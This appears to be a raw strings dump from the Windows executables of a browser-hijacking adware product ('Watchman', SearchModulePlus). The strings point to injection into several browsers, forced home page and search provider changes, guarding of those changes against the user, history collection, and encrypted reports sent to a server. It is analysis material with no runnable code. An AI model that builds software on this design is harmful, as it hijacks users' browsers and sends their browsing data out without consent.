E:\chrome.exe

E:\firefox.exe

E:\opera.exe

E:\Safari.exe|E:\navigator.exe|E:\torch.exe|E:\U.exe|E:\epic.exe|E:\browser.exe|E:\Maxthon.exe|E:\sbframe.exe|E:\avant.exe|E:\dragon.exe|E:\bobrowser.exe

smei32.dll

smci32.dll

smfi32.dll

smoi32.dll

smri32.dll

smi32.exe

Utils::PipedProcess::Create

Utils::PipedProcess::Start

Utils::PipedProcess::WriteData

[ReportDllsThread]

ProcessWatcher::ExecutionContext::Resume

Local proxy port:

127.0.0.1

[ProxyMonitor::getProcessByPort]

Failed to get GetExtendedTcpTable

[ReportBuilder::MakeDefaultBrowserSettingsElement]

[ReportBuilder::CalculateHash]

Result.Hash:

[ReportBuilder::MakeHistoryReport]

Building history report...

ReportBuilder::GetWMISystemInfo

ReportBuilder::GetExplorerBrowserInfo

ReportBuilder::GetChromeBrowserInfo

. Chrome Search:

History Report:

[ReportBuilder::MakeReport]

Report:

[ReportBuilder::GetExplorerBrowserInfo]

[ReportBuilder::GetChromeBrowserInfo]

Chrome::BrowserInfo::Factory::Create

Chrome::BrowserInfo::Factory::GetInfo

sma.exe

Utils::PipedProcess::ReadData

Utils::PipedProcess::Wait

Utils::PipedProcess::WriteEof

777705555443332

5555443332

5555443332

Utils::MachineKey::Create

Utils::MachineKey::Generate

Encrypt data. Key:

Decrypt data. Key:

ReportBuilder::MakeInstallReport

[ServerReporter::SendInstallReport]

ReportBuilder::MakeUninstallReport

[ServerReporter::SendUninstallReport]

ReportBuilder::MakeRegulatReport

[ServerReporter::SendRegularReport]

ReportBuilder::MakeUserActionReport

[ServerReporter::SendUserActionReport]

ReportBuilder::MakeHistoryReport

[ServerReporter::SendHistoryReport]

ServerReporter::MakeReport

ServerReporter::SendReport

[ServerReporter::SendReport]

ServerEncryption::CreateSessionKey

Report in Base 64:

10D2FBE6-2346-4627-A9F5-FB48313C5001

ServerReporter::Implementation::GetTargetUrl - User GUID is problematic GUID (hardcoded/unknown)

ServerReporter::Implementation::GetTargetUrl - Failed replacing problematic GUID with new one

[ServerReporter::GetUserProfile]

[ServerReporter::MakeReport]

ServerReporter::GetUserProfile

ReportBuilder::Create

Result.Report:

[ServerReporter::SetLastReportTime]

WatchmanKey::Reporter::SetLastTime

Package url:

WatchmanKey::Updater::SetLastTime

.Service

\Microsoft\Windows\Start Menu

*.lnk

\Internet Explorer\iexplore.exe

\Safari\Safari.exe

/report

/report1

%d.%d.%d.%d%n

Created URL Set object from configuration. Name:

UrlSetID:

Could not find matching URL set... Using old configuration

[LocalScope::UpdateParser::ParseReportSection]

Monitor::ServerEncryption::CreateSessionKey

Full url:

Data url:

sbu.exe

smw.sys

wscript.exe

smhe.js

[Monitor::WatchmanGuard::SendReport]

InstallReporter

Monitor::ServerReporter::Create

Monitor::ServerReporter::SendInitialReport

/urlset:

Options.InjectAllBrowsers:

Options.InjectDefaultOnly:

Options.ServiceName:

Options.ProductCode:

Options.ProductPriority:

Options.EnablePinner:

Options.EnableRedirect:

Options.EnableYellowBandSuppression:

Options.UpdateUrl:

Options.ReportUrl:

Options.AutoStart:

Options.ProtectSearch:

Options.ProtectHome:

Options.ProtectTab:

Options.ExplorerInjection:

Options.ChromeInjection:

Options.FirefoxInjection:

Options.OperaInjection:

Options.ConfigPath:

Options.ConfigKey:

Getting current URL Set

Getting URL Set from options

] Provided. And is different from current URL set [

URL Set [

Need to send report!!!

ServerReporter::Create

Original report URL:

URL to use:

ServerReporter::SendInitialReport

general_config.xml

system_config.xml

[WatchmanInstaller::SendReport1]

iexplore.exe is running, result for getting DLL's:

firefox.exe is running, result for getting DLL's:

chrome.exe is running, result for getting DLL's:

ServerReporter::SendRegularReport

[WatchmanInstaller::SendReport]

ServerReporter::SendHistoryReport

Currently set URLSet:

Updating system config with new URL set...

Already reported duiring first install

Report' been sent:

WatchmanInstaller::SendReport1

calling SendReport1...

WatchmanInstaller::SendReport

[Monitor::WatchmanMonitor::CreateSendReportTask]

SendReportTask

new<SendReportTask>

[Monitor::WatchmanMonitor::OnSendReportSucceeded]

[Monitor::WatchmanMonitor::OnSendReportFailed]

[Monitor::WatchmanMonitor::OnChromeProtectionChanged]

User has changed the chrome protection for:

[Monitor::WatchmanMonitor::OnResetFirefoxProtection]

User has reset the firefox protection:

Next report task:

Scheduller::RegisterTask<SendReportTask>

Monitor::Application::EnsureSystemKey

Options.Revert:

Settings.Final:

UninstallReporter

profiles.ini

prefs.js

Mozilla\Firefox\

[Firefox::InstallInfo::ReadProfiles]

[Firefox::InstallInfo::ParseProfiles]

[Firefox::InstallInfo::QueryProfiles]

Firefox::InstallInfo::ReadProfiles

Firefox::InstallInfo::ParseProfiles

[Firefox::InstallInfo::Query]

SHELL32.DLL

No profiles found! Maybe - first start of Firefox?

ADVAPI32.DLL

shlwapi.dll

Utils::Registry::OpenKeyExW

Subkey:

[Utils::Registry::RecursiveDeleteKeyW]

SHLWAPI.GetAddressOf<SHDeleteKeyW>

WKERNEL32.DLL

VERSION.DLL

NTDLL.DLL

[Utils::PipedProcess::CreateOutputHandles]

[Utils::PipedProcess::CreateInputHandles]

[Utils::PipedProcess::SpawnProcess]

Utils::PipedProcess::CreateOutputHandles

Utils::PipedProcess::CreateInputHandles

Utils::PipedProcess::SpawnProcess

[Utils::PipedProcess::Start]

[Utils::PipedProcess::Wait]

Utils::PipedProcess::WriteProc

[Utils::PipedProcess::WriteData]

Utils::PipedProcess::ReadProc

[Utils::PipedProcess::ReadData]

.cache

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

ntdll.dll

Could not create memory object. Object name: %s. %%s

Could not open memory object. Object name: %s. %%s

Could not map memory object. Object name: %s. %%s

Could not map memory object. Object name: %s. Size: %u. %%s

Could not create sync object for memory. Object name: %s. %%s

pathToSignedProductExe

SELECT * FROM Win32_OperatingSystem

A[BrowserHistory::GetPropertyReport]

Found URL:

GIPHLPAPI.DLL

GX-hX-hX-XX-XXXXXX

\\.\pipe\

Could not create thread event. %%s

Could not create new client event. %%s

Could not create accept thread. %%s

Could not create work thread. %%s

Could not start thread. %%s

Stop IPC error. %%s

Pipe (0x%X) read problems. %%s

IAction::QueryInterface<IExecAction>

IExecAction::put_Path

IExecAction::put_WorkingDirectory

IExecAction::put_Arguments

Ghttp\shell\open\command

Software\Microsoft\Windows\CurrentVersion\App Paths

[Utils::SoftwareInfo::GetHttpOpenHandler]

Utils::Registry::OpenKeyW

[SynchronousPipe::Write]

[SynchronousPipe::Read]

SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

Not enough memory. Size: %s (%s)

Error code: %u ('%s')

Could not allocate IPC memory. Requires size: %u

Could not create pipe. %%s

Could not create pipe event. %%s

Event error. %%s

Pipe connecting error. %%s

HCould not create IPC event. %%s

yIEXPLORE.EXE

SuggestionURL

FaviconURL

TopResultURLFallback

Software\Microsoft\Internet Explorer\AboutURLs

Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

Software\Microsoft\Windows\CurrentVersion\Ext\Settings

Failed to call enum URL's. Error:

[Injection::Snapshot::Chrome::Settings::Dump]

[Injection::Snapshot::Firefox::Settings::Dump]

[Monitor::RestoreData::Controller::Build<ChromeSettings>]

[Monitor::RestoreData::Controller::Build<FirefoxSettings>]

[Injection::Snapshot::Builder::BuildSettings<ChromeSettings>]

[Injection::Snapshot::Builder::BuildSettings<FirefoxSettings>]

new<ChromeSettings>

Injection::Snapshot::Parser::Parse<ChromeSettings>

new<FirefoxSettings>

Injection::Snapshot::Parser::Parse<FirefoxSettings>

ReadStringNode<AboutTabsUrl>

[Injection::Snapshot::Parser::Parse<ChromeSettings>]

ReadStringNode<DefaultProviderKeyword>

[Injection::Snapshot::Parser::Parse<FirefoxSettings>]

[Injection::Snapshot::Controller::IsChromeInstalled]

Chrome::BrowserSettings::Create

[Injection::Snapshot::Controller::IsFirefoxInstalled]

Firefox::BrowserSettings::Create

Chrome::BrowserSettings::RestoreState

Firefox::BrowserSettings::RestoreState

Argument.SystemConfig:

Argument.Config::General:

Argument.Config::User:

Chrome::BrowserSettings::PropagateState

Firefox::BrowserSettings::PropagateState

Argument.UserSid:

WatchmanKey::Users::SaveRestoreData

[WatchmanKey::GetEncryptionKey]

MachineKey::Create

MachineKey::Generate

[WatchmanKey::CleanupKey]

[WatchmanKey::LoadEncodedData]

WatchmanKey::GetEncryptionKey

[WatchmanKey::SaveEncodedData]

[WatchmanKey::System::LoadGeneralConfig]

WatchmanKey::System::Open

WatchmanKey::LoadEncodedData

[WatchmanKey::System::SaveGeneralConfig]

WatchmanKey::System::Ensure

WatchmanKey::SaveEncodedData

[WatchmanKey::System::LoadSystemConfig]

[WatchmanKey::System::SaveSystemConfig]

[WatchmanKey::Users::Ensure]

WatchmanKey::EnsureKey

[WatchmanKey::Users::Open]

WatchmanKey::OpenKey

[WatchmanKey::Users::LoadConfiguration]

WatchmanKey::Users::Ensure

[WatchmanKey::Users::SaveConfiguration]

[WatchmanKey::Users::LoadRestoreData]

[WatchmanKey::Updater::SetLastTime]

[WatchmanKey::Updater::SetBlackListHash]

[WatchmanKey::Updater::GetBlackListHash]

[WatchmanKey::Reporter::GetLastTime]

[WatchmanKey::Reporter::SetLastTime]

[WatchmanKey::TimeBomb::Uninstall]

WatchmanKey::SystemKey::Open

smod.xml

SearchModulePlus.crx

{7F4EFF06-7032-458e-AE16-1C1D8255C28A}

{CFBFAE00-17A6-11D0-99CB-00C04FD64497}

hXXp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}

DATAMNGR.DLL

IEBHO.DLL

[Config::General::UrlSet::Copy]

[Config::General::Chrome::Settings::Dump]

[Config::General::Chrome::Settings::Copy]

[Config::General::Chrome::ValueSet::Copy]

[Config::General::Firefox::Settings::Dump]

[Config::General::Firefox::Settings::Copy]

[Config::General::Firefox::ValueSet::Copy]

[Config::General::Opera::Settings::Dump]

[Config::General::Opera::Settings::Copy]

Config::General::Parser::ParseUrlSet

Config::General::Parser::ParseChromeSettings

Config::General::Parser::ParseFirefoxSettings

Config::General::Parser::ParseOperaSettings

ReadStringNode<StartPageUrl>

lReadStringNode<AboutTabUrl>

ReadStringNode<SearchScopeUrl>

ReadStringNode<SearchScopeIconUrl>

ReadStringNode<SearchScopeSuggestUrl>

[Config::General::Parser::ParseChromeSettings]

MissedElement<GoogleChrome>

Config::General::Parser::ParseChromeValueSets

[Config::General::Parser::ParseChromeValueSets]

ReadStringNode<HomePageUrl>

ReadStringNode<DefaultProviderSearchUrl>

ReadStringNode<DefaultProviderIconUrl>

ReadStringNode<DefaultProviderSuggestUrl>

[Config::General::Parser::ParseFirefoxSettings]

MissedElement<MozillaFirefox>

Config::General::Parser::ParseFirefoxValueSets

[Config::General::Parser::ParseFirefoxValueSets]

ReadOptionalStringNode<HomePageUrl>

ReadOptionalStringNode<SearchPluginUrl>

ReadOptionalStringNode<SearchPluginSuggestionUrl>

[Config::General::Parser::ParseUrlSet]

MissedElement<UrlSet>

ReadStringNode<TabPageUrl>

ReadStringNode<SearchEngineFaviconUrl>

ReadStringNode<SearchEngineSuggestionUrl>

ReadStringNode<SearchEngineSearchUrl>

dReadStringNode<SearchEngineKeyword>

[Config::General::Parser::ParseOperaSettings]

MissedElement<Opera>

yReadStringNode<Key>

[Config::General::Builder::Build<ChromeSettinsg>]

[Config::General::Builder::Build<FirefoxSettinsg>]

[Config::General::Builder::Build<OperaSettinsg>]

We couldn't find the URL Set section... probably an old configuration!

WatchmanKey::System::LoadGeneralConfig

WatchmanKey::System::SaveGeneralConfig

JReset-2.1.0.7

2.1.0.7

2.0.0.0

ReadOptionalStringNode<UrlSet>

ReadStringNode<UpdateUrl>

ReadStringNode<ReportUrl>

ReadBooleanNode<GoogleChrome>

ReadBooleanNode<MozillaFirefox>

ReadBooleanNode<Opera>

Could not find URL Set in configuration. Probably older configuration.

WatchmanKey::System::LoadSystemConfig

WatchmanKey::System::SaveSystemConfig

[Config::User::Chrome::Settings::Copy]

[Config::User::Firefox::Settings::Copy]

Config::User::Parser::ParseChromeSettings

Config::User::Parser::ParseFirefoxSettings

[Config::User::Parser::ParseChromeSettings]

[Config::User::Parser::ParseFirefoxSettings]

[Config::User::Builder::BuildChromeSettings]

[Config::User::Builder::BuildFirefoxSettings]

WatchmanKey::User::LoadConfiguration

WatchmanKey::User::SaveConfiguration

CChromeExtension::GetFileListInExtenstion

GCHROME.EXE

__MSG_

manifest.json

messages.json

WebData

[Chrome::BrowserInfo::Query]

Google\Chrome

\Application\chrome.exe

\Google\Chrome\Application\chrome.exe

\resources.pak

\Google\Chrome\Application\

\Web Data

[Chrome::BrowserSettings::OpenConfigFiles]

Chrome::InstallInfo::Get

SQLite::WebDataDB::Create

[Chrome::BrowserSettings::SetHomePagePreferences]

Argument.HomePageUrl:

Argument.HomePageIsNewTabPage:

[Chrome::BrowserSettings::SetDefaultProviderPreferences]

Argument.DefaultProviderId:

Argument.DefaultProviderKeyWord:

Argument.DefaultProviderName:

Argument.DefaultProviderEncoding:

Argument.DefaultProviderSearchUrl:

Argument.DefaultProviderIconUrl:

Argument.DefaultProviderSuggestUrl:

[Chrome::BrowserSettings::SetRestoreOnStartupPreferences]

Argument.RestoreOnStartup:

Argument.UrlsToRestoreOnStartup:

[Chrome::BrowserSettings::GetSearchProviderId]

Argument.KeywordToSearch:

SQLite::WebDataDB::GetFirstProviderId

SQLite::WebDataDB::GetProviderById

Result.ProviderId:

[Chrome::BrowserSettings::EnsureSearchProvider]

SQLite::WebDataDB::Values::Create

[Chrome::BrowserSettings::DeleteSearchProvider]

Key deleted:

[Chrome::BrowserSettings::MakeSnapshot]

[Chrome::BrowserSettings::RestoreState]

Chrome::BrowserSettings::OpenConfigFiles

Chrome::BrowserSettings::DeleteSearchProvider

SQLite::WebDataDB::SetDefaultProvider

[Chrome::BrowserSettings::PropagateState]

Chrome::BrowserSettings::EnsureSearchProvider

[SQLite::Implementation::AddProvider]

[SQLite::Implementation::GetProviderById]

[SQLite::Implementation::GetProviderByKeyword]

[SQLite::Implementation::GetFirstProviderId]

[SQLite::Implementation::GetProviderId]

Lchrome-extension://

13050095043000000

4BB42133-5533-4A0C-BF72-F1B8C8776A11

Checking<extensions.settings>

Opera Software\Opera Stable\

\Opera\launcher.exe

\opera.pak

\Opera\

Web Data

\resources\default_partner_content.json

[Firefox::BrowserSettings::MakeSnapshot]

[Firefox::BrowserSettings::RestoreState]

[Firefox::BrowserSettings::PropagateState]

Software\Microsoft\Internet Explorer\URLSearchHooks

[Explorer::BrowserSettings::SetMainKeyValues]

[Explorer::BrowserSettings::SetTabbedBrowsingKeyValues]

[Explorer::BrowserSettings::SetSearchScopeKeyValues]

[Explorer::BrowserSettings::SetAboutURLsKeyValues]

Argument.SearchScopeToSearch:

Result.SearchScope:

[Explorer::BrowserSettings::DeleteKey]

Argument.Parent:

Argument.Subkey:

VirtualSpeedbitSearchScopeKey::EnsureKeyW

SuggestionsURLFallback

SuggestionsURL

FaviconURLFallback

TopResultURL

KERNELBASE.DLL

sma.exe_1376:

.text

`.rdata

@.data

.rsrc

@.reloc

Ix.SHx

Wxs.Ux

Windows 2003

Windows 7

Windows Vista

Windows XP

Windows Me

Windows 2000

Windows NT4

Windows 98

Windows 95

%%x

C:\BUILDS\Build_Watchman\Ver2\Speedbit.Watchman\Bin\SearchModulePlus_SearchModulePlus\Win32\WinMV\Release\sma.pdb

InternetOpenUrlA

HttpQueryInfoW

HttpSendRequestExW

HttpOpenRequestW

InternetCrackUrlW

WININET.dll

KERNEL32.dll

USER32.dll

ShellExecuteW

SHELL32.dll

MSVCP90.dll

MSVCR90.dll

_amsg_exit

_crt_debugger_hook

GetNamedPipeInfo

.?AVImplementation@HttpInvoker@Agent@SpeedBit@@

.?AVHttpInvoker@Agent@SpeedBit@@

.?AVCCDHTTPEngine@@

.?AVCCDHTTPGenericRequest@@

.?AVCCDHTTPUploader@@

.?AVJOB_HTTP@@

.?AVHTTPJOB@@

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>

?.?8?>?]?{?

7„8c8p8

0(010:0]0

> >$>(>,>0>

/Url:

Utils::SynchronousPipe::IsPipe

Utils::SynchronousPipe::Read

Agent::HttpInvoker::Create

Agent::HttpInvoker::UploadData

Agent::HttpInvoker::DownloadData

Utils::SynchronousPipe::Write

[Agent::HttpInvoker::UploadData]

[Agent::HttpInvoker::DownloadData]

CCDJobMgr::AddHTTPGenericJob

@logs\${ModuleName}.${Pid}.log

@KERNEL32.DLL

Content-Type: application/x-www-form-urlencoded

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)

@[SynchronousPipe::Write]

[SynchronousPipe::Read]

2, 1, 9, 476

sma.exe

smu.exe_772:

.text

`.rdata

@.data

.rsrc

@.reloc

FTPj

E@PSSh

 1 23 456

Jx.SHx

.TxK%Yx

208.69.150.250

208.69.150.252

8.8.8.8

SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\

Catcher.ProcessId:

Catcher.Path:

Watcher.Filter:

2.1.9.476

smu.exe

Chrome

Report.xml

/Url:

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

3.7.2

SQLite format 3

CREATE TABLE sqlite_master(

sql text

CREATE TEMP TABLE sqlite_temp_master(

REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYo

inflate 1.2.3 Copyright 1995-2005 Mark Adler

deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly

1.2.3

?456789:;<=

!"#$%&'()* ,-./0123

Report factory:

Update.xml

URLSet

Report

homeURL

suggestURL

newTabURL

ieSearchURL

chSearchURL

ffSearchURL

opSearchURL

chromeKeyword

[UpdateParser::Implementation::UpdateParser::ParseUrlSetSection]

vup.tmp

Argument.CheckResult:

Argument.IsRunning:

Delivery of report succeeded. TaskId:

Delivery of report failed.

&#xX;

</%s>

%s="%s"

%s='%s'

<!--%s-->

<![CDATA[%s]]>

version="%s"

encoding="%s"

standalone="%s"

SHDeleteKeyW

RegDeleteKeyExA

RegDeleteKeyExW

NtQueryKey

1.3.6.1.4.1.311.2.1.12

Snapshot.xml

GoogleChrome

MozillaFirefox

AboutTabsUrl

HomePageUrl

DefaultProviderKeyword

UrlsToRestoreOnStartup

StartupHomepageUrl

Chrome propagate flags:

Firefox propagate flags:

ParentKey:

GvrV5 fIBwR5G1CQDyLsic/pOLfRYKAGRyMxV8NxzSLudH5dYJ7ItKYE7rC1AC99X2kzxEChSNvkXetV0jCmjqUjmvO10UOWty3ApOQucR/hia9cu3H02a 5R CG5qhR8Y/uzTzzCr4GfPZ8D8t88yUqyCjdTSd8VRzWUuml0XIRmAC3mIaIBnS0qtpU54eeMa P511PX57TteCBWpQr UysHS8QouOBFyhBBaanipF1PUZ8zItL9IeCtaFExJDKcxi7FU7dmU7ctk7EMZZR3AC3j7jgcRnxrBRdeCW5PDYDKjcHmxPGAZm ePsRg6dCH9XvAsXiSqWsGTuCaJydkQ6BC6sdjbBYCQUNu0nP10JlSn5NzpucbmEgVB1WLSsSDe9vYbtKTOOJRR/CGu7qSqmZ1YxAdjnPMshzg FPfycjHdyERU/SZHvERWXU9WjRnocOXQbT0XOzcBQYfdCa3hiBDgamllsamooTTof6lK6Zb2EYpLiqRQU8WOQCSQu3D2YDP5v9J1Ah7R5gFH4pWrujpklOckba/Bhit29bHcRVAi6mCX5DamNCUq4tY5YMLWVOyVlPLgnZ2 AoHHhCVzsJqNqYZAEseYuauz5gxxhiozc82QCxEJsH2wDGV4Fnf8fmimJyQybsVBebTkkGhRnXfu0YEB4r2oBX3lttd09zG gE2dSUZsHBBBRwvxpM1HoEdvDeLKIaszMpTdRi5i9Rjlxfi9Gpe0mMgvRgepguez9/DfrgUpCVpjnmdNa5TuEirTy3 3mUWdojeY6y8tNBJLsyaj2cmjca3wiE/pLENTnow dbju2fmW9Odso8GLznFwJ6v7o aa2XPOVqX1qryZzbVRaYkdUtOZwrz3FBq1reAfrk12qBENZPPGH8qFcC1Xta09MnkMdxGwD1VeVH6y1RoVkpTPp8mumzKWoXv9DMFPLowiUNgpG22Ss2Vl3szBKCiwYupVQT1GMO/8/psE5WgwQjj9GkHyf3qsI7DSk3d1tp6LFKIdpFPw1fKx72Xwkee0n1T14ksSGewLuCI5WBuOqSexXFXKxmwFhXlCqivfRWSmIJP3ILQrfZbdILbXlwYfOJaoFIMMzCvlMq1hNa/26crmnuBXd8PAHYi5oF Ezzi28v/GmzOTan5Inj1p29ta/WyOajmdLkVPj/Ff/85EnaiNPV62/inI0Y G cikLBu94xgMNywTIn0iSo0A2A5zcNR0/W3DEqGCgbVHqqqN7oxy08Qx5h2gnrOB oSz4TfhJ72enIju7sYLTxMA7kHQzi1uY89QwqJ0lVbA0qUWOVGk3mHyuDH6s6ZsaVE21RT7iGvRc QmQG7X0EwDW3iK5YkiyDUwVzhYEGWfcbv2oR3qOQQDzTqwWYUeFmo0zKzQ86B08jN52EcuOE/ZCkLYCStfmrxhGiipXWbEWtFa973DaRy3KrobC50pz6S4AQ Xu9RlrutYMXGmRg/8hI08I4xW5uWRoMqVCLBcPq478k/Ez1Iuvw3JZBa5n3BHwmUosLcnRRpHWRptiZlKMNviUquLgwrIMhacWmDWX6DGjZz72knZzg3qzYwKatnnRjfEtXRrxXq5dKWE8P/XvlVCstT/qYqNm964Oc46C0p/j6M59qVRvkUnAZuZKVVXVc04fSy4FjvJzrD5LfXxpYA7lBFQ60fZYVir 54eC83A5L9BfivvGlwewWfWS5racrcSmF5nYMxn3f8EjwkuZK91BRZlAPdRAg1gfb2ohlntdntu/8x6g1Fph870zNk13u7LFWihV1csZZqZaKcf8uHi wLKouWpmT1vhCNR07YaH6glQvRnt556rVJvZWmKsVI D11NhFxQLUCKde TCvcZ9s8s2wVPTRW5ahtdYOUnZTFvHHm6WxjtFCc nNYa9LXYdoHnqQQbbKdnkYE3sY0r1cUZAZcLNGx7JjJlAz wLhxfvJ5Se6MsCoFx4tMQppa5N4IrcPL90Nqa0IehVmEvHvCsO96nwiOiJpFF5Rng8RAqrvnP7fJBgG grlD9sfim7R2LOvb8LIeDb/HkDwIOy0Ypq2WpWoj2sTSzv4LQeLmJnKqL8dPxNApEeCe/on90DLRH/7K2BOfAj4xNnkG8Wurgv8Aq205ha0rLU9c3fMu9qrSi/Lbh E5HwYMA/tzBwF6ZXR99yS0gt mz6yNCN8w9wK3 0cO6uoanOjzCCxkuXpkyIU5hIi4/aW0TS2NlDFlvgPs37FyXA3rM0rHHeEds6 N2YImzYWB45i3GqILHKLBnTYfsLAUMKSLqWFcSqlD2EAOJbgUN2dhhIZd8JSqHyltvUyR8fGRbT8H1C6lFlFw6TCxTjkY7hSGOB6CqzEs33tkr55PJUiBsU lrpTQX7T29psodMnih9sC97Wb6zIFJyIfIoxaxbcC411rqyJV WlRazWlP9dmcgd2KEqEuh HIGycoc6a74vp4I1eVo4j1DXtAbXnHEj/Nzk4NsFusbI9x9r8yoJGsAjKACoQqPoqgY6Nh6OgOPbqO0KcFE6RykrPzFDk087OfMz9xiaFrZcW9VdEoOGStbeIbQ61UbyXpHDkUpxIwy4WM6Q9jKdPcTJ3aBz3FCcdefxnGRHHeQ/TqrwU4zZ7WYikjCOoz6MLXTYdCCnrllA//dUk4rwM1HWaGHEMhUdSy8hKAd5bLH9JrVLB06axRgBYkgEfMAtdk/nTZwNFANA3xxxsjmlKtAzYNMpGhR5Jt2gs wEJKr3LF4mYqDxTmRdmxZzTSVlyupVv4c9WZc 5yFM63XebcscL6A4Vnd3tBpJCwY7BQj/INn 6L4DYFeEPAk3u56A6Idj9m5n3G8ElGy2ioOO5NLlT2BbQaf ydP 9doEgUl5I8vsvV3drtRmh8NlZTBnor4rhMg/5817TDiQOHVX/6ICKz8QAQ1qXh7rzHRgxv7l4hHdXC4BGHwimaD0vYdupfNiXOzJcR9Zi2FrL85kXZm/pKyAcUuT4mzwjvKHO8APVYBS3WPir7VT2GFuHIUk1jJdNzKYgPjW22pzqdWXzPCSwjqDtq1qci7tqa/iOikTtCsTOpe AtNDxBDyzbGRaGFRyDRmXf33o2wcd//5IkfU7zQDa8WdYYUqsJynEUW42wWLV2nfjyqvreKblZDfYXn7THCHpV FJqIA6QA3pVD/Iu4KCRWdwZhmGMf5115QF0A6wrHoiZr/C/c/ZzCzFd9AGd0/X/RXx5kAb/zSif FfHcxHpQ1pq956dBZ1KjZrY9PyxZF/uA8rHRCmaSGD4KhAwxA/T36fiLBJIvl YXdITmqH9g nng7f45Zi7UUvzZxHqetki8rZ VsWB0xM9f7cSEmyvDEqfhNKYT P/d8P9NRwv9pUx8RxruqBWYeyfeSKjB j97YTQCVG7lhvWt9SPacgGMHYQuR8YiGg3n/fKOacQ7XY7aXdMHYubFWgoTODW1TvMnTvo9KyKdcPRIZQLlODCSK2cA1/R AIojRwIFEU3gXLsC9CzL9TEeGdDnmnpTjRR/oc4fnDwiFdwh1sts7dbUU/MKxC0vIxSqTJ Bm5RJuCOUcCIOEALJ suBTJvj4EmrcgctR6ryJKkGlDzGLrLWgyK0pY776i MXQ6AA3wbM3ZQi75onR2vwCjgg8UQv5DMcP6HUM17MXCEHdbIEUvhJAKDZ6LGKfkP96HQrEgqjjsj97SZh YcQTzaR0M7JY3K3RwE/Oqv8BkWJMrOL1Mnhg vKtsNcwhtpUsBwrBgu3JrXbI/x0dho12ZuysjpUNiI7l8TVGCz00XXU0TNrucXvRe0z35rEpiTe9S/xdMqSDXmdGPz0VAHnfSf7GAckWfA3cfc6 fK3empP1a92e LLSpLJ eMrocYgVIvvo3sTpDaXWjQTa02srQEfZ9IFEOoEy3hYk1SzsXYanCd2UpHfsIHUn7A6Q5RL6kWAZXZjwXvcyDAd/iE/QmFFsENOkaEHNg5OVQeNkq6yEZdfdzPkkTSoD4ztUHEJpeNg66Z9bb085oS J3S42RvycdQGnk5Oi5IEzP24pIdF j3sKq17UXVbyMFHV8lOjWSlh1Y0Kq937bvGCBsnRwVwsXGaLrE0r4tLCj m5AR2mFP4JZKENROWGtv3BprlrMyW6uvd5XSKuyvDiHUpXC6X9vrBPdjhmY u1Ix3RLWWPyTlPNW9REKmk L6jtTqOdXQBBY6llXsDP GxJn/t1uTRSFktjf19T8K50owKGTnlhpUoqBt9WVKYR6YyGit8Mk9OX/kVR75EdE/t/VVSU/iQ4d3nFk75apgn3VoMIbDYB0MU7nPdwWV4Bw3vs2RpHTpOtd1ALNwE2rqG4GkKoTSlO7r7pf/7JUPLCEJ3MTmW ertKdGAF44MJoB5oJUC7cRpKE1GGYau4eKBe29fIMqabrVr6QSkkptljw8q6a9b0s51CNzKlcCEcnJ7cb8LzsVCoGFhsnLlYPtWEiZHnck3lMYWn 3dXBSbWlR5w4LH5uACO4/rhbVUD4ucX8Q3I xuwLg6D9pwjadqdcdeihP/dYMvbQkdRk/tNAX0NaFWMR/HAAIfPoqp/1rr1gRVssVKEiGD5sEAwe6oTJDXp53arWV3D/D5vn5IujBQ 2rnEYYUHXiy8l1JERR4rjNA7DT12jpOMT0jMd3iVIUBUj1mzjGZXIzrf1f/a31pbSCu 0xzo QvEihKjVfvV3OARI6o/U01YFNMB9PVBsYErGfiDd63JVmt3N8qLiFu9vjgbuR8v1Rqn6xhFt/268gxSnx6tR6RFkFakyk6xOIaoJqswSm7afKhThe55zMkJ1PXHaus/uKqhRKSx4PeLqR FvkdLVc1JiARy7RTdtBf4Bb2EFW11 XM3gU54DShNFXlldANcdZN6m/SO8vvJk2D45MvLWXyNVpppvdKfZ8gxSFna86neYQQ5MDbA2ybUl7PMmpMhipbx4u11sXUrkPb1krAEmlZe8b0NidLcTj9VOBgLD1OGyOnG 6iwNfShAh8UxAiZdQsOW7WkEAhvQWcu8F7zEZv1/RgOnyZj8h3NoufhlpqLWpBDf1Yn2TzN3mCKZZVtLWxoUGYN5hKFOHNw wFzSF/NcvveWIPceTitVXSx5V6KEMOmO9a8dbLLGj7wxi CD8aPNkL axxoWufJlAgNxC5vXoEVAtplK0CHRgJ/wFPHmREGEF7NKP9A1ATHTHzs97I04evT1dSc49oXK9XKbkx4nNsdwgeSdyWVKCABqAz9kVRVIom17pjwW8hc2JMJMhfEYUhDTenPgRu39cVRdPbHRBv9RULbqFimTLA6Ty1z2vN d RyOelC1Br/KCR1gs3 82Cpw9ANMYOUJSuSRxU/0yUKmboVum8icoM 1NpWi o 